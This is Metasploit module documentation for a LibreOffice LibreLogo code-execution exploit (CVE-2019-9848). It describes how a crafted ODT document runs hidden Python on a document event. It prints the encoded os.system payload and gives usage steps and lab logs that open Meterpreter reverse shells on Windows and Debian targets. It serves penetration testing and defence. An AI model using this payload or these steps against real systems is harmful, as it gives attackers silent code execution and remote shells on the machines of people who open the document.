metasploit-gs/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md

Description

This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands.

By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning.

This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.

The generated document file contains a one-liner python code that calls os.system:

getattr(__import__(“os”),“system”)(“<%= @cmd %>”)

but encoded :

<text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>

To avoid any python error, the h1 title written in the document is a python comment #.

Vulnerable Application

LibreOffice version 6.2.5 and prior.

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/multi/fileformat/libreoffice_logo_exec
4. Do: set LHOST <ip>
5. Do: set LPORT <port>
6. Do: run
7. Move the generated file to the target
8. Start a handler
9. Open the file with a vulnerable version of LibreOffice
10. You should get a shell.

Scenarios

Tested on LibreOffice 6.2.4 running Windows 7

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (179779 bytes) to 192.168.33.102
[*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400

meterpreter > 

Tested on LibreOffice 6.2.4 running Debian 9.9

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (985320 bytes) to 192.168.33.117
[*] Meterpreter session 5 opened (192.168.33.1:4444 -> 192.168.33.117:43602) at 2019-07-29 04:44:04 -0400

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter >